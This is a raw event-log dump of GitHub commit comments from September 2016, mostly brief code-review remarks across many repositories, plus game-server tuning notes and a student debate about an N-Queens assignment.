{"id":"4615333479","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"WestleyArgentum/Lumberjack.jl"},"payload":{"comment":{"id":19166483,"position":6,"line":128,"path":"test/test-lumberjacktruck.jl","commit_id":"2a077f871ca0b5326a41d2dbbb69479352607381","created_at":"2016-09-26T01:34:30Z","updated_at":"2016-09-26T01:34:30Z","body":"what caused this to change, specifically? it's best to be precise with VERSION-dependent cutoffs like this in case this package triggers a bug in base that needs bisecting"}},"created_at":"2016-09-26T01:34:30Z"}
{"id":"4615333521","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19166484,"position":null,"line":null,"path":null,"commit_id":"ea43df918d1a8afedf1cdae03847f56d15a2b352","created_at":"2016-09-26T01:34:31Z","updated_at":"2016-09-26T01:34:31Z","body":"  \t\t<summon name=\"rift invader\" interval=\"1000\" chance=\"5\" max=\"10\"/>\r\n  \t\t<summon name=\"enthralled demon\" interval=\"1000\" chance=\"15\" max=\"10\"/>\r\n\r\nShould be the real chances, since it summons more demons rather than rift invaders.\r\n\r\nAlso it has around 1% to drop feru hat.\r\n\r\nIn about 7 months, just dropped two.\r\n\r\nCheck Tibia Cast."}},"created_at":"2016-09-26T01:34:31Z"}
{"id":"4615334963","type":"CommitCommentEvent","actor":{"login":"knario117"},"repo":{"name":"azzaeelhg/SIPDEP"},"payload":{"comment":{"id":19166489,"position":null,"line":null,"path":null,"commit_id":"2d178d7ca3920e12b52587ebfbf8a7398929cd8b","created_at":"2016-09-26T01:35:17Z","updated_at":"2016-09-26T01:35:17Z","body":"sugerí que era mejor tener todos el mismo usuario de la base de datos para cada vez que se descargue la versión mas reciente del sistema no sean diferentes usuarios, todos agregamos el usuario sipdep en nuestras maquinas."}},"created_at":"2016-09-26T01:35:17Z"}
{"id":"4615338559","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19166505,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-26T01:37:14Z","updated_at":"2016-09-26T01:37:14Z","body":"Here's another comparison. Say that flight flight to Morocco doesn't have enough fuel. Then you ain't landing in Morocco. Neither a lack of engines nor a lack of enough fuel fuel will get your plane to Morocco. Having both engines and fuel will. Therefore they are both important. The purpose of the plane is to get you somewhere, the purpose of the fuel is to allow it to do that; if the plane couldn't achieve its goal then it didn't work. The purpose of the program is to show you the Queens solution. If it couldn't do that because there were no \"extra\" methods to figure out the solution, then it didn't work. It's irrelevant whether the program runs because it has the main method. It needs both."}},"created_at":"2016-09-26T01:37:14Z"}
{"id":"4615339661","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19166511,"position":null,"line":null,"path":null,"commit_id":"e3f17ff49f686d7b0571e1cfe465d9156c473c0b","created_at":"2016-09-26T01:37:48Z","updated_at":"2016-09-26T01:37:48Z","body":"This is a teleport to a ruthless seven boss?\r\n\r\nIt has 48 hrs cooldown in RL, so you can come in (after you kill it)."}},"created_at":"2016-09-26T01:37:48Z"}
{"id":"4615340350","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19166513,"position":null,"line":null,"path":null,"commit_id":"8ca17db5d664de5b4c666676938ebc026c328dd0","created_at":"2016-09-26T01:38:13Z","updated_at":"2016-09-26T01:38:13Z","body":"This is a teleport to a ruthless seven boss?\r\n\r\nIt has 48 hrs cooldown in RL, so you can come in (after you kill it)."}},"created_at":"2016-09-26T01:38:13Z"}
{"id":"4615340549","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19166514,"position":null,"line":null,"path":null,"commit_id":"f29ff74f7ef8465ccc6eab319a4d96bf520e4053","created_at":"2016-09-26T01:38:19Z","updated_at":"2016-09-26T01:38:19Z","body":"This is a teleport to a ruthless seven boss?\r\n\r\nIt has 48 hrs cooldown in RL, so you can come in (after you kill it)."}},"created_at":"2016-09-26T01:38:19Z"}
{"id":"4615340653","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19166515,"position":null,"line":null,"path":null,"commit_id":"e077c7c58b8eb3f9b323135b9b34c6b2317579ae","created_at":"2016-09-26T01:38:23Z","updated_at":"2016-09-26T01:38:23Z","body":"This is a teleport to a ruthless seven boss?\r\n\r\nIt has 48 hrs cooldown in RL, so you can come in (after you kill it)."}},"created_at":"2016-09-26T01:38:23Z"}
{"id":"4615340749","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19166516,"position":null,"line":null,"path":null,"commit_id":"8dae98ec14d634dec0dfe0dfc18b761c61151a6f","created_at":"2016-09-26T01:38:26Z","updated_at":"2016-09-26T01:38:26Z","body":"This is a teleport to a ruthless seven boss?\r\n\r\nIt has 48 hrs cooldown in RL, so you can come in (after you kill it)."}},"created_at":"2016-09-26T01:38:26Z"}
{"id":"4615340841","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19166518,"position":null,"line":null,"path":null,"commit_id":"a88d248c50941ef9fc35ea677edf0516d8bfb43f","created_at":"2016-09-26T01:38:29Z","updated_at":"2016-09-26T01:38:29Z","body":"This is a teleport to a ruthless seven boss?\r\n\r\nIt has 48 hrs cooldown in RL, so you can come in (after you kill it)."}},"created_at":"2016-09-26T01:38:29Z"}
{"id":"4615340921","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19166519,"position":null,"line":null,"path":null,"commit_id":"201f5fe0a6c8dc019ab4144d7ef877b62ba1cc7d","created_at":"2016-09-26T01:38:32Z","updated_at":"2016-09-26T01:38:32Z","body":"This is a teleport to a ruthless seven boss?\r\n\r\nIt has 48 hrs cooldown in RL, so you can come in (after you kill it)."}},"created_at":"2016-09-26T01:38:32Z"}
{"id":"4615342340","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19166524,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-26T01:39:18Z","updated_at":"2016-09-26T01:39:18Z","body":"Woah woah woah. Getting to Morocco is the extra. Flying is the important part. Who cares if you get to Morocco. 👍 "}},"created_at":"2016-09-26T01:39:18Z"}
{"id":"4615345999","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19166532,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-26T01:41:11Z","updated_at":"2016-09-26T01:41:11Z","body":"Quite frankly I prefer to end up in Morocco than the bottom of the Atlantic."}},"created_at":"2016-09-26T01:41:11Z"}
{"id":"4615346011","type":"CommitCommentEvent","actor":{"login":"shizihao123"},"repo":{"name":"njuLearningTeam/leetcode"},"payload":{"comment":{"id":19166533,"position":null,"line":null,"path":null,"commit_id":"94b716664e2fd362aa91d1105c09d0db212e96ad","created_at":"2016-09-26T01:41:11Z","updated_at":"2016-09-26T01:41:11Z","body":"thx"}},"created_at":"2016-09-26T01:41:11Z"}
{"id":"4615346419","type":"CommitCommentEvent","actor":{"login":"daurnimator"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19166537,"position":null,"line":null,"path":null,"commit_id":"7eb8592035a034c3adbfa3a9aa2dbf8db792971d","created_at":"2016-09-26T01:41:23Z","updated_at":"2016-09-26T01:41:23Z","body":"Don't forget the other lowering area up at https://github.com/rockdaboot/libpsl/blob/7eb8592035a034c3adbfa3a9aa2dbf8db792971d/src/psl.c#L725"}},"created_at":"2016-09-26T01:41:23Z"}
{"id":"4615350178","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19166541,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-26T01:43:17Z","updated_at":"2016-09-26T01:43:17Z","body":"And while I am on that flight I would also rather watch a computer program figure out the solution to n Queens than watch a main method run infinitely, or throw some exception because there was a problem in the canSolve method that is really the main method of the program even though it is not actually a main method! "}},"created_at":"2016-09-26T01:43:17Z"}
{"id":"4615353428","type":"CommitCommentEvent","actor":{"login":"aliciafeed"},"repo":{"name":"aliciafeed/aliciafeed.github.io"},"payload":{"comment":{"id":19166546,"position":1,"line":1,"path":"stylesheets/stylesheet.css","commit_id":"172558d945ab0af3164080f390680488647ac619","created_at":"2016-09-26T01:44:56Z","updated_at":"2016-09-26T01:44:56Z","body":"@import url(http://fonts.googleapis.com/earlyaccess/notosanskr.css);\r\n font-family: 'Noto Sans KR', sans-serif;"}},"created_at":"2016-09-26T01:44:56Z"}
{"id":"4615354087","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19166549,"position":null,"line":null,"path":null,"commit_id":"2d470fa933004f54a9e846e1388e2f6f7548dea5","created_at":"2016-09-26T01:45:16Z","updated_at":"2016-09-26T01:45:16Z","body":"http://tibia.wikia.com/wiki/Rift_Invader\r\n\r\nThere is no data about it but I can tell you that I got headshoted once with an MS 470 by one of those.\r\n\r\nThey hit around 2000-3000 drown attack.\r\n\r\nWalk realtively slow.\r\n\r\nThey should be convinceable in order to damage Ferumbras Ascendant.\r\n\r\nFerumbras Ascendant just receive damage from these creatures.\r\n\r\nWhen it dies, it summons Ferumbras Mortal Shell.\r\n\r\nNow rift invaders doesn't do damage to this last summon."}},"created_at":"2016-09-26T01:45:16Z"}
{"id":"4615356461","type":"CommitCommentEvent","actor":{"login":"Anson365"},"repo":{"name":"Anson365/framework"},"payload":{"comment":{"id":19166557,"position":null,"line":null,"path":null,"commit_id":"d04cb785d23d3948f226a59970be560050d8b97d","created_at":"2016-09-26T01:46:31Z","updated_at":"2016-09-26T01:46:31Z","body":"这个又回到了redis和memcache的选择问题上了。其实两者都行，看你具体的使用场景了"}},"created_at":"2016-09-26T01:46:31Z"}
{"id":"4615370406","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19166597,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-26T01:53:27Z","updated_at":"2016-09-26T01:53:27Z","body":"Fine fine."}},"created_at":"2016-09-26T01:53:27Z"}
{"id":"4615371793","type":"CommitCommentEvent","actor":{"login":"sk392"},"repo":{"name":"sk392/FittingMirror"},"payload":{"comment":{"id":19166601,"position":null,"line":null,"path":null,"commit_id":"2e1c8d16525e50026dec9658b77e3979bf5e3c91","created_at":"2016-09-26T01:54:08Z","updated_at":"2016-09-26T01:54:08Z","body":"FittingMirror\r\nAndroid Application"}},"created_at":"2016-09-26T01:54:08Z"}
{"id":"4615372272","type":"CommitCommentEvent","actor":{"login":"sk392"},"repo":{"name":"sk392/FittingMirror"},"payload":{"comment":{"id":19166603,"position":null,"line":null,"path":null,"commit_id":"acbc7ea48c222af9e7df4043cb2294a837fc0380","created_at":"2016-09-26T01:54:22Z","updated_at":"2016-09-26T01:54:22Z","body":"Fitting Mirror\r\nMain Program"}},"created_at":"2016-09-26T01:54:22Z"}
{"id":"4615374540","type":"CommitCommentEvent","actor":{"login":"xudafeng"},"repo":{"name":"macacajs/macaca-cli"},"payload":{"comment":{"id":19166608,"position":null,"line":null,"path":null,"commit_id":"5032141e0a911e09d7d5a895e79292fe94b5be90","created_at":"2016-09-26T01:55:30Z","updated_at":"2016-09-26T01:55:30Z","body":"@zensh 接受邀请 https://github.com/alibaba/macaca/invitations"}},"created_at":"2016-09-26T01:55:30Z"}
{"id":"4615375253","type":"CommitCommentEvent","actor":{"login":"xudafeng"},"repo":{"name":"macacajs/macaca-cli"},"payload":{"comment":{"id":19166612,"position":null,"line":null,"path":null,"commit_id":"5032141e0a911e09d7d5a895e79292fe94b5be90","created_at":"2016-09-26T01:55:51Z","updated_at":"2016-09-26T01:55:51Z","body":"@zensh 需要帮忙吗？"}},"created_at":"2016-09-26T01:55:51Z"}
{"id":"4615375912","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"AsYetUntitled/Framework"},"payload":{"comment":{"id":19166613,"position":null,"line":null,"path":null,"commit_id":"db66e545ef02faec2a2e9fd152eb5260b3deab8a","created_at":"2016-09-26T01:56:10Z","updated_at":"2016-09-26T01:56:10Z","body":"See also: \r\n* [life_hc//fn_mresArray: Fix for 1.64 str change](https://github.com/AsYetUntitled/Framework/commit/419aae8cb3327c4ae7c3f9303786819adc2a6140)\r\n* https://github.com/AsYetUntitled/Framework/issues/104 \r\n* [str command does not escape nested double-quotes for strings](https://feedback.bistudio.com/T79720) \r\n"}},"created_at":"2016-09-26T01:56:10Z"}
{"id":"4615378346","type":"CommitCommentEvent","actor":{"login":"trevcor"},"repo":{"name":"profoundry-us/material"},"payload":{"comment":{"id":19166615,"position":null,"line":null,"path":null,"commit_id":"2c7d8e049295657fe9fdc62c9fde76aba0006682","created_at":"2016-09-26T01:57:22Z","updated_at":"2016-09-26T01:57:22Z","body":"Was this ever merged in?"}},"created_at":"2016-09-26T01:57:22Z"}
{"id":"4616834931","type":"CommitCommentEvent","actor":{"login":"ambroisemaupate"},"repo":{"name":"maxexcloo/Docker"},"payload":{"comment":{"id":19169949,"position":1,"line":1,"path":"base/data/Dockerfile","commit_id":"71881d37aa68433212f304edda05b6a27616ba22","created_at":"2016-09-26T10:00:02Z","updated_at":"2016-09-26T10:00:02Z","body":"Hi @maxexcloo \r\n\r\nWhy did you delete your *maxexcloo/data* image?\r\n\r\nIt was a great way not to create volumes manually on the host if you host multiple application/websites.\r\n"}},"created_at":"2016-09-26T10:00:02Z"}
{"id":"4616837166","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/barsoom_utils"},"payload":{"comment":{"id":19169952,"position":5,"line":28,"path":"README.md","commit_id":"f7cdbfc846a37d7723db2377673d06f2d72fa988","created_at":"2016-09-26T10:00:25Z","updated_at":"2016-09-26T10:00:25Z","body":"About the “we recommend…” part. It is possible to re-use the health check in more than one environment and that could cause some confusing behaviour."}},"created_at":"2016-09-26T10:00:25Z"}
{"id":"4616843601","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19169970,"position":null,"line":null,"path":null,"commit_id":"601b267202430491127716af7d70c62e2cf9ca2c","created_at":"2016-09-26T10:01:42Z","updated_at":"2016-09-26T10:01:42Z","body":"Have a look at `rb_ary_new_from_args`.\r\nMaybe we can have a macro that turns var args in an Object[] or a Ruby Array if that's common enough."}},"created_at":"2016-09-26T10:01:42Z"}
{"id":"4616861858","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19169988,"position":4,"line":35,"path":"lib/ruby/truffle/cext/ruby.h","commit_id":"5d39b7419cd4e8f6ec50c2bf994f74a138866cea","created_at":"2016-09-26T10:05:36Z","updated_at":"2016-09-26T10:05:36Z","body":"MRI has an `ALWAYS_INLINE` for this, but it takes the function prototype as argument."}},"created_at":"2016-09-26T10:05:36Z"}
{"id":"4616863263","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19169991,"position":19,"line":20,"path":"movie.rb","commit_id":"fdeef04485ac04190a9c1af57d87526168c60a22","created_at":"2016-09-26T10:05:53Z","updated_at":"2016-09-26T10:05:53Z","body":"Почему не просто `nil`?.."}},"created_at":"2016-09-26T10:05:53Z"}
{"id":"4616863679","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19169994,"position":15,"line":15,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-26T10:05:57Z","updated_at":"2016-09-26T10:05:57Z","body":"desc.indexOf(':') ? $.trim(desc.split(':')[1]) : desc；\r\n如果desc字段串的第一个字符就是：，则还会执行三元表达式中后面的逻辑，所以判断条件应该写全：\r\ndesc.indexOf(':') >-1 ? $.trim(desc.split(':')[1]) : desc；"}},"created_at":"2016-09-26T10:05:57Z"}
{"id":"4616865446","type":"CommitCommentEvent","actor":{"login":"0xdeafcafe"},"repo":{"name":"0xdeafcafe/alx-red"},"payload":{"comment":{"id":19169999,"position":null,"line":null,"path":null,"commit_id":"ee224942fb46143b9c95bed8d656bf643e434c5e","created_at":"2016-09-26T10:06:18Z","updated_at":"2016-09-26T10:06:18Z","body":"string*"}},"created_at":"2016-09-26T10:06:18Z"}
{"id":"4616865904","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19170000,"position":15,"line":17,"path":"movie.rb","commit_id":"fdeef04485ac04190a9c1af57d87526168c60a22","created_at":"2016-09-26T10:06:23Z","updated_at":"2016-09-26T10:06:23Z","body":"Достаточно `if @date[1]`, вообще-то (nil — ведёт себя как falsy values в if-ах)"}},"created_at":"2016-09-26T10:06:23Z"}
{"id":"4616866349","type":"CommitCommentEvent","actor":{"login":"geekard"},"repo":{"name":"influxdata/kapacitor"},"payload":{"comment":{"id":19170003,"position":null,"line":null,"path":null,"commit_id":"2289c9dc4e2cba2af32200b84b5d47ab157ade8e","created_at":"2016-09-26T10:06:29Z","updated_at":"2016-09-26T10:06:29Z","body":"BTW, Do you support  checking alert duration time? Do not fire a alert if its duration time is less than configured value."}},"created_at":"2016-09-26T10:06:29Z"}
{"id":"4616869168","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"dergraaf/xpcc"},"payload":{"comment":{"id":19170009,"position":41,"line":41,"path":"src/xpcc/architecture/platform/driver/core/cortex/driver.lb","commit_id":"309655a5e1e960f6af9ac43dfc50bbd79ab95c05","created_at":"2016-09-26T10:07:05Z","updated_at":"2016-09-26T10:07:05Z","body":"Regarding `[0]`, see https://github.com/roboterclubaachen/xpcc/issues/30."}},"created_at":"2016-09-26T10:07:05Z"}
{"id":"4616871987","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19170017,"position":10,"line":20,"path":"movie_collection.rb","commit_id":"fdeef04485ac04190a9c1af57d87526168c60a22","created_at":"2016-09-26T10:07:40Z","updated_at":"2016-09-26T10:07:40Z","body":"Хорошо бы чтобы вот так тоже работало: `filter(year: 2001..2005, country: /France|Belgium/)` \r\nРекомендации: \r\n* сделать фильму метод `matches?(filter, value)`\r\n* посмотреть на метод `===`"}},"created_at":"2016-09-26T10:07:40Z"}
{"id":"4616874052","type":"CommitCommentEvent","actor":{"login":"dreyks"},"repo":{"name":"rails/sprockets-rails"},"payload":{"comment":{"id":19170020,"position":5,"line":5,"path":"CHANGELOG.md","commit_id":"10bc1bd096b39a3dd632571dd517788314657056","created_at":"2016-09-26T10:08:07Z","updated_at":"2016-09-26T10:08:07Z","body":"This is actually the opposite of what really happens: truthy value allows fallback while falsey leads to raising an error"}},"created_at":"2016-09-26T10:08:07Z"}
{"id":"4616875511","type":"CommitCommentEvent","actor":{"login":"rouazana"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":19170021,"position":13,"line":204,"path":"mailbox/maildir/src/main/java/org/apache/james/mailbox/maildir/MaildirFolder.java","commit_id":"827b0336fe7d3816416453da4a7b71a79009f6d9","created_at":"2016-09-26T10:08:26Z","updated_at":"2016-09-26T10:08:26Z","body":"getLastUid is called several times with the same object. First time lastUid == null (it is sort of a cache) and populated with its real value, which can be Optional.absent or Optional.something if the mailbox is not empty.\r\nIf you check !isPresent(), you'll make the request each time."}},"created_at":"2016-09-26T10:08:26Z"}
{"id":"4616876077","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19170023,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-26T10:08:34Z","updated_at":"2016-09-26T10:08:34Z","body":"Do you have a box with transcoding? I could arrange that.\r\nTranscoding is not stopped here. BS does no longer occur, but transcoding does NOT stop."}},"created_at":"2016-09-26T10:08:34Z"}
{"id":"4616877234","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19170025,"position":31,"line":36,"path":"movie_collection.rb","commit_id":"fdeef04485ac04190a9c1af57d87526168c60a22","created_at":"2016-09-26T10:08:49Z","updated_at":"2016-09-26T10:08:49Z","body":"Если ты будешь использовать `flatten` всегда, то без `if` можно вообще обойтись ;)"}},"created_at":"2016-09-26T10:08:49Z"}
{"id":"4616882939","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19170031,"position":22,"line":28,"path":"movie_collection.rb","commit_id":"fdeef04485ac04190a9c1af57d87526168c60a22","created_at":"2016-09-26T10:10:02Z","updated_at":"2016-09-26T10:10:02Z","body":"а) по-моему два group_by это перебор ;)\r\nб) `group_by { |i| i }` можно переписать как `group_by(&:itself)`"}},"created_at":"2016-09-26T10:10:02Z"}
{"id":"4616895176","type":"CommitCommentEvent","actor":{"login":"mikeweilgart"},"repo":{"name":"benjaminoakes/maid"},"payload":{"comment":{"id":19170052,"position":21,"line":18,"path":"README.md","commit_id":"d727286d7d9cc9ce0795851070acf2271ce63931","created_at":"2016-09-26T10:12:41Z","updated_at":"2016-09-26T10:12:41Z","body":"Is this still accurate?  Hazel does not appear to be Shareware; it says it will expire after a 14-day evaluation period.  Or is that not enforced?"}},"created_at":"2016-09-26T10:12:41Z"}
{"id":"4616895265","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore"},"payload":{"comment":{"id":19170053,"position":null,"line":null,"path":null,"commit_id":"0c3605686915892fbd75025e2799f0c5afb672fe","created_at":"2016-09-26T10:12:43Z","updated_at":"2016-09-26T10:12:43Z","body":"Big Man with BIG BALLSSS)))))"}},"created_at":"2016-09-26T10:12:43Z"}
{"id":"4616895332","type":"CommitCommentEvent","actor":{"login":"you-n-g"},"repo":{"name":"guolinke/deep-learning-benchmarks"},"payload":{"comment":{"id":19170054,"position":null,"line":null,"path":null,"commit_id":"b04b8a7ec1ad0eeb96ba44f604cc1fa9882acbaf","created_at":"2016-09-26T10:12:43Z","updated_at":"2016-09-26T10:12:43Z","body":"Yes.     using  momentum  will make it slower. "}},"created_at":"2016-09-26T10:12:43Z"}
{"id":"4616897215","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19170057,"position":19,"line":19,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-26T10:13:09Z","updated_at":"2016-09-26T10:13:09Z","body":"一般字符串转数字是用+或者-0都可以;"}},"created_at":"2016-09-26T10:13:09Z"}
{"id":"4616899596","type":"CommitCommentEvent","actor":{"login":"gre"},"repo":{"name":"gre/react-native-view-shot"},"payload":{"comment":{"id":19170058,"position":null,"line":null,"path":null,"commit_id":"8b46f34611ea81a92d4090a6bcab436d4e850fd5","created_at":"2016-09-26T10:13:40Z","updated_at":"2016-09-26T10:13:40Z","body":"if you want to test this, needs to install react & react-native locally and then run flow (when installed)."}},"created_at":"2016-09-26T10:13:40Z"}
{"id":"4616901851","type":"CommitCommentEvent","actor":{"login":"hxl888"},"repo":{"name":"hxl888/666"},"payload":{"comment":{"id":19170065,"position":null,"line":null,"path":null,"commit_id":"c65b39b4ce18835c14184f71e17208b74b90aa23","created_at":"2016-09-26T10:14:11Z","updated_at":"2016-09-26T10:14:11Z","body":"666"}},"created_at":"2016-09-26T10:14:11Z"}
{"id":"4616903476","type":"CommitCommentEvent","actor":{"login":"NBerkel"},"repo":{"name":"denzilferreira/aware-client"},"payload":{"comment":{"id":19170070,"position":null,"line":null,"path":null,"commit_id":"d55260daeeef54078e2d9ee5d9fd069930737e77","created_at":"2016-09-26T10:14:32Z","updated_at":"2016-09-26T10:14:32Z","body":"We tested this new toast behaviour on two devices and found that the toast would not disappear from the screen. Can you replicate this behaviour?\r\nI believe this is the result of the Service thread being completed before the toast is made to disappear again. If so, I suggest rollback to notification method or find a way to post the toast outside the Service thread.\r\n"}},"created_at":"2016-09-26T10:14:32Z"}
{"id":"4616907248","type":"CommitCommentEvent","actor":{"login":"mirdo"},"repo":{"name":"TerraTex-Community/TerraTex-Reallife-Reloaded"},"payload":{"comment":{"id":19170072,"position":null,"line":null,"path":null,"commit_id":"1af2506d7c36434a2e7640f9b70047ea27fe38e1","created_at":"2016-09-26T10:15:23Z","updated_at":"2016-09-26T10:15:23Z","body":"Hat wirklich ein Punkt statt nem Komma wirklich den kompletten Mülljob lahm gelegt? "}},"created_at":"2016-09-26T10:15:23Z"}
{"id":"4616907864","type":"CommitCommentEvent","actor":{"login":"Isammoc"},"repo":{"name":"Isammoc/play-angular2-typescript"},"payload":{"comment":{"id":19170074,"position":null,"line":null,"path":null,"commit_id":"d40e427a40aed05af5eee98d625de85bfbd78bbc","created_at":"2016-09-26T10:15:31Z","updated_at":"2016-09-26T10:15:31Z","body":"It's working, and last version of RxJs does not. That's why I didn't upgrade it.\r\n\r\nI'm a beginner with front-end dev, so I just test if what I need works.\r\nPlease carefully check before merging."}},"created_at":"2016-09-26T10:15:31Z"}
{"id":"4616909079","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19170075,"position":null,"line":null,"path":null,"commit_id":"756f82042a5aaa188622ad0647df8db159afb5ef","created_at":"2016-09-26T10:15:46Z","updated_at":"2016-09-26T10:15:46Z","body":"What about when building with `DEBUG=yes`, should this become `-DCMAKE_BUILD_TYPE=Debug`?"}},"created_at":"2016-09-26T10:15:46Z"}
{"id":"4616915388","type":"CommitCommentEvent","actor":{"login":"RodolpheFouquet"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19170085,"position":null,"line":null,"path":null,"commit_id":"939e436cf88cdffd92b94bea7eb1f4a51247187b","created_at":"2016-09-26T10:17:09Z","updated_at":"2016-09-26T10:17:09Z","body":"Ok I'll fix that, though that still doesn't fix the issue I've discussed about via mails."}},"created_at":"2016-09-26T10:17:09Z"}
{"id":"4616917305","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19170092,"position":null,"line":null,"path":null,"commit_id":"3854578fcde31efc902753f6b4db425a091ec094","created_at":"2016-09-26T10:17:34Z","updated_at":"2016-09-26T10:17:34Z","body":"I try the 'fixed' , and i think the vertical-align: middle; can come from core. If vertical-align: middle; come from core : we can add margin-top:0/margin-botttom:0 and then no issue with this awfull margin (when using offset().top : jquery return 8,8787px for a margin of 10px ...)"}},"created_at":"2016-09-26T10:17:34Z"}
{"id":"4616918724","type":"CommitCommentEvent","actor":{"login":"aslam558"},"repo":{"name":"posabsolute/jQuery-Validation-Engine"},"payload":{"comment":{"id":19170094,"position":null,"line":null,"path":null,"commit_id":"863793cb3697d3778554ab415e38e38374ce7cb3","created_at":"2016-09-26T10:17:51Z","updated_at":"2016-09-26T10:17:51Z","body":"hi,\r\nI think i have asked you a wrong question.\r\n\r\nQuery is when i select a value in drop-down of select box, error message is not hiding until and unless when we go to other field.\r\nFor my requirement is, when i click on any value in select box it immediately should should validate and get hide,\r\n\r\nThanks!"}},"created_at":"2016-09-26T10:17:51Z"}
{"id":"4616922802","type":"CommitCommentEvent","actor":{"login":"upy"},"repo":{"name":"EnetModa/suds-philpem"},"payload":{"comment":{"id":19170098,"position":null,"line":null,"path":null,"commit_id":"c150800f30d4e2445fd2717bb3f6e5d34ca37b64","created_at":"2016-09-26T10:18:45Z","updated_at":"2016-09-26T10:18:45Z","body":"Applied https://fedorahosted.org/suds/ticket/353"}},"created_at":"2016-09-26T10:18:45Z"}
{"id":"4616926359","type":"CommitCommentEvent","actor":{"login":"KiberInfinity"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19170102,"position":null,"line":null,"path":null,"commit_id":"98d0f8164ba95a66e13df8dcdb982ba86af0126d","created_at":"2016-09-26T10:19:30Z","updated_at":"2016-09-26T10:19:30Z","body":"когда делал, тех виджетов ещё не было)"}},"created_at":"2016-09-26T10:19:30Z"}
